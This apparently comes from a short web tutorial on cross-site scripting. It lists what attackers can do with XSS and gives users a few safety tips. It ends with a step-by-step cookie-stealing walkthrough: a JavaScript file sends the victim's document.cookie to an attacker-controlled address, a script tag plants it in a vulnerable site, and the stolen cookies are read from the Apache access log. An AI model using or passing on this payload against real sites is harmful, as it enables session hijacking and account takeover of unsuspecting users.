Steal victim’s cookie using Cross Site Scripting (XSS)
XSS, cross-site scripting is a vulnerability that allows an attacker to insert malicious code (JavaScript) into a website script. Once a script has been found to be vulnerable the attacker can e-mail or post a link to that website script to attack a user’s computer.
What can a hacker do with cross-site scripting?
- Execute JavaScript code.
- Access cookies stored on a computer to gain access to the victims account.
- Create fake login pages that steal login details.
- Access webcams and microphones connected to a computer.
- Bypass website security designed to protect you and your computer.
- Create a script that loops or causes other problems that cause the browser to crash.
- Help other computers perform a DDoS attack on another server.
- Give the appearance of the site being defaced.
- Help distribute spam, transfer money, or perform other actions on a user’s account.
How users can reduce being a victim to cross-site scripting
- Always be cautious with links sent by e-mail and posted on social networks.
- Never click on a link reporting to be from any financial service or other sensitive site. If your bank, credit card, or related service is wanting you to click on a link open your browser and enter the web address in the address bar.
- Familiarize yourself with phishing tactics.
- When done with your online account log out.
- Keep your browser up-to-date with the latest version.
Steal victim’s cookie using Cross Site Scripting (XSS)
- Create cookie.js filevar img = document.createElement (“img”);
img.src = “http://youipaddress/ddos?” + escape(document.cookie);
document.body.appendChild(img); - Put cookie.js to your websever
- Inset script tag into a vulnerable website.
<script src=”http://youripaddress/cookie.js”></script> - If your victim visits link that you sent, you will get your victim cookie. You can view apache log at sudo leafpad /var/log/apache2/access.log directory
Demo
https://www.youtube.com/watch?v=I-AA97JSKXc
